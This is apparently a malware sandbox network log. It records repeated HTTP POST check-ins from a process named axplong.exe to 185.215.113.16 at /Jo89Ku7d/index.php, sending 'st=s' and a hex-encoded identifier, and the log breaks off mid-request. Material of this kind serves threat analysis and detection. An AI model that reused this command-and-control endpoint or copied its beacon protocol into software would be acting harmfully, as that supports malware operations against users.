                    Timestamp  Bytes transferred  Direction  Data
                    Sep 27, 2024 03:07:08.026561022 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:08.732630968 CEST  219  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:08.733555079 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:08.964117050 CEST  196  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                    6  192.168.2.6  56630  185.215.113.16  80  4932  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp  Bytes transferred  Direction  Data
                    Sep 27, 2024 03:07:09.073431969 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:09.772164106 CEST  219  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:09.802272081 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:10.029757977 CEST  196  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                    7  192.168.2.6  56631  185.215.113.16  80  4932  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp  Bytes transferred  Direction  Data
                    Sep 27, 2024 03:07:10.152601957 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:10.842747927 CEST  219  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:10.843728065 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:11.066420078 CEST  196  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                    8  192.168.2.6  56632  185.215.113.16  80  4932  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp  Bytes transferred  Direction  Data
                    Sep 27, 2024 03:07:11.184969902 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:11.914814949 CEST  219  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:11.915779114 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:12.147262096 CEST  196  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    9 | 192.168.2.6 | 56633 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:12.260907888 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:12.969038010 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:12.970021963 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:13.196770906 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    10 | 192.168.2.6 | 56634 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:13.307682991 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:14.036765099 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:14.037873983 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:14.272277117 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    11 | 192.168.2.6 | 56635 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:14.385904074 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:15.076287985 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:15.077049971 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:15.300765991 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    12 | 192.168.2.6 | 56636 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:15.421773911 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:16.111293077 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:16.114751101 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:16.337707996 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    13 | 192.168.2.6 | 56637 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:16.448446989 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:17.138154984 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:17.139090061 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:17.362603903 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    14 | 192.168.2.6 | 56638 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:17.481440067 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:18.191874027 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:18.193197012 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:18.419306040 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    15 | 192.168.2.6 | 56639 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:18.528597116 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:19.222018957 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:19.222898960 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:19.446369886 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    16 | 192.168.2.6 | 56640 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:19.560893059 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:20.274652958 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:20.282001019 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
